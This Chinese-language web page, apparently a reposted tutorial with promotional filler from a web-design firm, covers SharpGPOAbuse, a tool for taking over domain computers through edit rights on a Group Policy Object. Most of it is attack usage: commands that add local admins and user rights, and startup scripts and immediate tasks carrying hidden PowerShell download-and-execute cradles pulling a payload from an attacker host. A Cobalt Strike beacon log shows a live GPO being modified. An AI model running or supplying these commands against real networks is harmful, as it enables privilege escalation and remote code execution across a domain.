本篇內(nèi)容主要講解“怎么通過用戶的編輯權(quán)限控制組策略對象控制對象”�,感興趣的朋友不妨來看看����。本文介紹的方法操作簡單快捷�,實(shí)用性強(qiáng)��。下面就讓小編來帶大家學(xué)習(xí)“怎么通過用戶的編輯權(quán)限控制組策略對象控制對象”吧!
站在用戶的角度思考問題���,與客戶深入溝通��,找到利辛網(wǎng)站設(shè)計(jì)與利辛網(wǎng)站推廣的解決方案��,憑借多年的經(jīng)驗(yàn)����,讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合,創(chuàng)造個(gè)性化��、用戶體驗(yàn)好的作品�����,建站類型包括:網(wǎng)站制作���、做網(wǎng)站���、企業(yè)官網(wǎng)、英文網(wǎng)站�、手機(jī)端網(wǎng)站、網(wǎng)站推廣�、域名與空間、網(wǎng)頁空間����、企業(yè)郵箱��。業(yè)務(wù)覆蓋利辛地區(qū)�����。
關(guān)于SharpGPOAbuse
SharpGPOAbuse是一個(gè)功能強(qiáng)大的.NET應(yīng)用程序��,SharpGPOAbuse基于C#開發(fā)���,可以幫助廣大研究人員利用目標(biāo)系統(tǒng)中用戶針對一個(gè)組策略對象(GPO)的編輯權(quán)限來入侵并控制由該組策略對象(GPO)控制的對象。
項(xiàng)目獲取
廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地:
git clone https://github.com/FSecureLABS/SharpGPOAbuse.git
代碼編譯
請確保本地主機(jī)中必要的NuGet包已正常安裝����,然后就可以使用Visual Studio將項(xiàng)目導(dǎo)入之后直接編譯構(gòu)建了。
工具使用
Usage:
SharpGPOAbuse.exe <攻擊類型> <攻擊選項(xiàng)>
攻擊類型
當(dāng)前版本的SharpGPOAbuse支持下列攻擊類型:
選項(xiàng) | 描述 | --AddUserRights | 向用戶添加權(quán)限 |
--AddLocalAdmin | 向本地管理員組中添加一個(gè)用戶 |
--AddComputerScript | 添加一個(gè)新的計(jì)算機(jī)啟動腳本 |
--AddUserScript | 配置一個(gè)用戶登錄腳本 |
--AddComputerTask | 配置一個(gè)計(jì)算機(jī)立即執(zhí)行的任務(wù) |
--AddUserTask | 向用戶添加一個(gè)立即執(zhí)行的任務(wù) |
攻擊選項(xiàng)
添加用戶權(quán)限
Options required to add new user rights:
--UserRights
給用戶添加新的權(quán)限���,該參數(shù)大小寫敏感,可以使用逗號分隔的列表��。
--UserAccount
設(shè)置需要添加新權(quán)限的用戶賬號����。
--GPOName
存在安全漏洞的GPO名稱。
樣例:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
添加一個(gè)本地管理員
Options required to add a new local admin:
--UserAccount
設(shè)置需要添加進(jìn)本地管理員組中的賬號名稱��。
--GPOName
存在安全漏洞的GPO名稱。
樣例:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
配置一個(gè)用戶或計(jì)算機(jī)登錄腳本
Options required to add a new user or computer startup script:
--ScriptName
設(shè)置新啟動腳本的名稱��。
--ScriptContents
設(shè)置新啟動腳本的內(nèi)容�。
--GPOName
存在安全漏洞的GPO名稱。
樣例:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"如果你只想要對GPO控制的特定用戶或計(jì)算機(jī)執(zhí)行惡意腳本����,你可以在惡意腳本中添加一個(gè)if語句:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%== powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
配置計(jì)算機(jī)或用戶立即執(zhí)行的任務(wù)
Options required to add a new computer or user immediate task:
--TaskName
設(shè)置新計(jì)算機(jī)任務(wù)的名稱。Set the name of the new computer task.
--Author
設(shè)置新任務(wù)的開發(fā)者(可以使用DA賬號)����。
--Command
需要執(zhí)行的命令
--Arguments
傳遞給命令的參數(shù)。
--GPOName
存在安全漏洞的GPO名稱�����。
Additional User Task Options:
--FilterEnabled
啟用任務(wù)過濾器�。Enable Target Filtering for user immediate tasks.
--TargetUsername
目標(biāo)用戶,惡意任務(wù)只會針對特定用戶運(yùn)行�,格式為 \。
--TargetUserSID
目標(biāo)用戶的SID����。
Additional Computer Task Options:
--FilterEnabled
啟用任務(wù)過濾器。
--TargetDNSName
目標(biāo)DNS名稱�����,惡意任務(wù)只會針對目標(biāo)主機(jī)運(yùn)行。
樣例:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
如果你只想要對GPO控制的特定用戶或計(jì)算機(jī)運(yùn)行惡意任務(wù)��,你可以參照下列命令:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com額外選項(xiàng)
選項(xiàng) | 描述 | --DomainController | 設(shè)置目標(biāo)域控制器 |
--Domain | 設(shè)置目標(biāo)域名 |
--Force | 改寫現(xiàn)有文件 |
工具輸出樣例
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I
EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!到此�,相信大家對“怎么通過用戶的編輯權(quán)限控制組策略對象控制對象”有了更深的了解,不妨來實(shí)際操作一番吧����!這里是創(chuàng)新互聯(lián)網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢��,關(guān)注我們����,繼續(xù)學(xué)習(xí)!
當(dāng)前標(biāo)題:怎么通過用戶的編輯權(quán)限控制組策略對象控制對象
URL網(wǎng)址:
http://weahome.cn/article/ijchdo.html
重慶分公司
重慶分公司
